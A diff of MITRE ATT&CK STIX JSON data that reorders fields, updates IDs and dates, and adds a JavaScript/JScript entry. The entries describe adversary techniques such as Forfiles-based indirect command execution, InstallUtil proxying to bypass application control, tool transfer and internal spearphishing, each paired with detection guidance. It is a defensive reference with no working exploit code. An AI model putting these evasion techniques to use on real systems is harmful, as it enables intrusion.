+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
@@ -12625,8 +13126,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551",
- "url": "https://attack.mitre.org/techniques/T1551"
+ "external_id": "T1070",
+ "url": "https://attack.mitre.org/techniques/T1070"
},
{
"external_id": "CAPEC-93",
@@ -12646,9 +13147,17 @@
],
"modified": "2020-03-29T21:43:29.196Z",
"created": "2017-05-31T21:30:55.892Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.",
+ "x_mitre_defense_bypassed": [
+ "Log analysis",
+ "Host intrusion prevention systems",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"File monitoring",
@@ -12657,24 +13166,15 @@
"API monitoring",
"Windows event logs"
],
- "x_mitre_defense_bypassed": [
- "Log analysis",
- "Host intrusion prevention systems",
- "Anti-virus"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
- "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
- "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Indirect Command Execution",
- "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12697,9 +13197,10 @@
"source_name": "RSA Forfiles Aug 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
+ "name": "Indirect Command Execution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12707,7 +13208,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-02-05T14:28:08.379Z",
+ "modified": "2020-06-20T22:09:22.559Z",
"created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "1.1",
"x_mitre_contributors": [
@@ -12721,9 +13222,8 @@
],
"x_mitre_defense_bypassed": [
"Static File Analysis",
- "Application whitelisting",
- "Process whitelisting",
- "Whitelisting by file name or path"
+ "Application control",
+ "Application control by file name or path"
],
"x_mitre_detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)",
"x_mitre_permissions_required": [
@@ -12735,10 +13235,9 @@
"x_mitre_is_subtechnique": false
},
{
- "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Ingress Tool Transfer",
- "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12751,9 +13250,10 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
+ "name": "Ingress Tool Transfer",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12816,15 +13316,21 @@
"phase_name": "impact"
}
],
- "modified": "2019-07-19T14:37:37.347Z",
+ "modified": "2020-07-14T19:33:52.512Z",
"created": "2019-04-02T13:54:43.136Z",
- "x_mitre_contributors": [
- "Yonatan Gotlib, Deep Instinct"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
],
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "root",
+ "SYSTEM",
+ "User"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).",
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Windows Registry",
"Services",
@@ -12832,17 +13338,12 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "Administrator",
- "root",
- "SYSTEM",
- "User"
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).",
+ "x_mitre_impact_type": [
+ "Availability"
],
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux"
+ "x_mitre_contributors": [
+ "Yonatan Gotlib, Deep Instinct"
]
},
{
@@ -12883,19 +13384,10 @@
],
"modified": "2020-03-24T21:29:13.900Z",
"created": "2017-05-31T21:30:48.323Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "John Lambert, Microsoft Threat Intelligence Center"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root",
- "User"
- ],
- "x_mitre_detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.",
"x_mitre_data_sources": [
"Windows Registry",
"Windows event logs",
@@ -12909,10 +13401,19 @@
"Binary file metadata",
"API monitoring"
],
- "x_mitre_contributors": [
- "John Lambert, Microsoft Threat Intelligence Center"
+ "x_mitre_detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root",
+ "User"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b",
@@ -13073,19 +13574,10 @@
],
"modified": "2020-03-19T20:31:11.389Z",
"created": "2020-02-21T21:05:32.844Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation"
- ],
- "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
- "x_mitre_data_sources": [
- "SSL/TLS inspection",
- "Digital certificate logs"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
"x_mitre_contributors": [
"Matt Graeber, @mattifestation, SpecterOps",
@@ -13093,11 +13585,20 @@
"Travis Smith, Tripwire",
"Itzik Kotler, SafeBreach"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "SSL/TLS inspection",
+ "Digital certificate logs"
+ ],
+ "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b",
@@ -13126,7 +13627,7 @@
},
{
"id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107",
- "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)",
+ "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)",
"name": "InstallUtil",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -13156,31 +13657,47 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:45:33.971Z",
+ "modified": "2020-06-20T22:34:46.529Z",
"created": "2020-01-23T19:09:48.811Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Process whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Travis Smith, Tripwire",
"Casey Smith"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-02-12T14:08:48.689Z",
+ "modified": "2020-03-28T19:34:47.546Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d",
+ "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.",
+ "name": "Inter-Process Communication",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -13188,22 +13705,6 @@
"url": "https://attack.mitre.org/techniques/T1559"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Inter-Process Communication",
- "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.",
- "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T19:34:47.546Z",
- "created": "2020-02-12T14:08:48.689Z",
"x_mitre_platforms": [
"Windows"
],
@@ -13255,22 +13756,22 @@
],
"modified": "2020-03-29T22:57:04.784Z",
"created": "2020-02-20T14:31:34.778Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Integrity"
],
+ "x_mitre_detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
"x_mitre_data_sources": [
"Web logs",
"Web application firewall logs",
"Packet capture"
],
- "x_mitre_detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -13306,11 +13807,9 @@
],
"modified": "2020-03-15T00:46:26.598Z",
"created": "2020-03-14T23:08:20.244Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Process use of network",
"Process monitoring",
@@ -13318,13 +13817,15 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747",
- "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) or [Spearphishing Link](https://attack.mitre.org/techniques/T1192) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)",
+ "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)",
"name": "Internal Spearphishing",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -13354,24 +13855,9 @@
"phase_name": "lateral-movement"
}
],
- "modified": "2019-10-22T21:37:05.004Z",
+ "modified": "2020-03-31T22:13:33.718Z",
"created": "2019-09-04T19:26:12.441Z",
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)",
- "x_mitre_contributors": [
- "Tim MalcomVetter",
- "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
- ],
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux",
- "Office 365",
- "SaaS"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_data_sources": [
"SSL/TLS inspection",
"DNS records",
@@ -13380,7 +13866,23 @@
"File monitoring",
"Mail server",
"Office 365 trace logs"
- ]
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux",
+ "Office 365",
+ "SaaS"
+ ],
+ "x_mitre_contributors": [
+ "Tim MalcomVetter",
+ "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -13411,18 +13913,83 @@
],
"modified": "2020-02-10T19:52:47.724Z",
"created": "2020-02-10T19:49:46.752Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Binary file metadata"
],
- "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.",
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1059.007",
+ "url": "https://attack.mitre.org/techniques/T1059/007"
+ },
+ {
+ "source_name": "NodeJS",
+ "url": "https://nodejs.org/",
+ "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "JScrip May 2018",
+ "url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript",
+ "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft JScript 2007",
+ "url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript",
+ "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript \u2026. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft Windows Scripts",
+ "url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces",
+ "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "JavaScript/JScript",
+ "description": "Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nAdversaries may abuse JavaScript / JScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",
+ "id": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "modified": "2020-06-25T03:23:13.804Z",
+ "created": "2020-06-23T19:12:24.924Z",
+ "x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+ "x_mitre_data_sources": [
+ "Loaded DLLs",
+ "DLL monitoring",
+ "File monitoring",
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
